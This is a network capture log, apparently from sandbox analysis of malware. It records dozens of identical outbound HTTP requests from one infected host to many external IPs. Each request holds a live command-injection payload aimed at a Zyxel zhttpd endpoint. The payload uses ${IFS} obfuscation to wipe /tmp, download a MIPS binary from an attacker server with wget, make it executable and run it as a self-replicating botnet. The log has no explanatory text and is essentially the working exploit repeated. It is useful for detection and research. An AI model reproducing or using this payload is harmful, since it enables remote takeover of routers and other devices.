                              Mar 31, 2024 08:41:59.227674007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7671192.168.2.1355566169.230.246.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227704048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7672192.168.2.133690865.61.89.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227751017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7673192.168.2.134526044.119.92.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227792025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7674192.168.2.133777878.3.163.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227823019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7675192.168.2.1334522209.142.188.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227864027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7676192.168.2.1357366126.44.105.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227883101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7677192.168.2.134517439.230.210.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227916002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7678192.168.2.134248694.75.153.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227966070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7679192.168.2.1351464160.180.148.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227972984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7680192.168.2.1336258182.68.147.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228017092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7681192.168.2.1333022167.218.208.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228046894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7682192.168.2.135988845.143.138.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228065968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7683192.168.2.1357264172.40.187.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228094101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7684192.168.2.134936490.209.87.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228137016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7685192.168.2.1333078174.177.84.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228179932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7686192.168.2.135402093.40.140.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228235960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7687192.168.2.135632298.213.55.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228260994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7688192.168.2.135711674.191.197.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228285074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7689192.168.2.1356644203.151.140.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228321075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7690192.168.2.135910413.16.230.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228338003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7691192.168.2.1333206208.55.76.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228378057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7692192.168.2.135262844.30.45.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228432894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7693192.168.2.135891091.228.223.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228461027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7694192.168.2.1350780160.19.140.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228506088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7695192.168.2.134970025.99.21.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228533983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7696192.168.2.1333732104.79.138.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228543043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7697192.168.2.134693499.173.38.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228595018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7698192.168.2.1349152209.91.168.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.228606939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7699192.168.2.1337024163.33.164.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.229856014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7700192.168.2.1350430217.88.59.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.229918957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7701192.168.2.135116674.165.220.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.229958057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7702192.168.2.1347956223.54.119.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.229996920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7703192.168.2.1333412200.25.23.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.237701893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7704192.168.2.1341836178.183.163.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.237747908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7705192.168.2.1340400135.132.237.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.237786055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7706192.168.2.1348470105.55.251.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.237816095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7707192.168.2.135394840.174.75.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.237857103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7708192.168.2.134127044.28.133.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.237910032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7709192.168.2.134485290.199.91.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.237940073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7710192.168.2.133905017.93.129.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.237962008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7711192.168.2.1334360202.207.242.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238008976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7712192.168.2.134395641.201.168.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238053083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7713192.168.2.133374688.177.47.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238068104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7714192.168.2.133614839.89.82.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238107920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7715192.168.2.135585444.20.228.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238151073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7716192.168.2.1346616159.154.6.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238199949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7717192.168.2.1343200211.218.176.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238259077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7718192.168.2.1342100185.232.141.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238286972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7719192.168.2.133856645.67.23.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238322973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7720192.168.2.1346520155.105.190.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238358974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7721192.168.2.134367435.226.172.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238418102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7722192.168.2.1349018136.24.161.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238457918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7723192.168.2.1340930121.9.223.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238500118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7724192.168.2.1344818110.107.135.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238549948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7725192.168.2.1350886183.198.156.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238568068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7726192.168.2.1342350138.26.138.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238600016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7727192.168.2.1341074218.6.187.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238687992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7728192.168.2.1338748183.117.83.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238722086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7729192.168.2.134896644.248.176.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238765001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7730192.168.2.135805080.197.62.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238806009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7731192.168.2.1345536182.191.8.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238831043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7732192.168.2.1358470148.200.221.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238859892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7733192.168.2.135729851.92.150.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238929987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7734192.168.2.1350270143.95.114.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238965034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7735192.168.2.135783442.139.226.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.238995075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7736192.168.2.135003280.140.175.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239042044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7737192.168.2.135258841.126.24.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239094019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7738192.168.2.135789025.150.223.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239129066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7739192.168.2.1360388160.243.17.41443
                              TimestampBytes transferredDirectionData
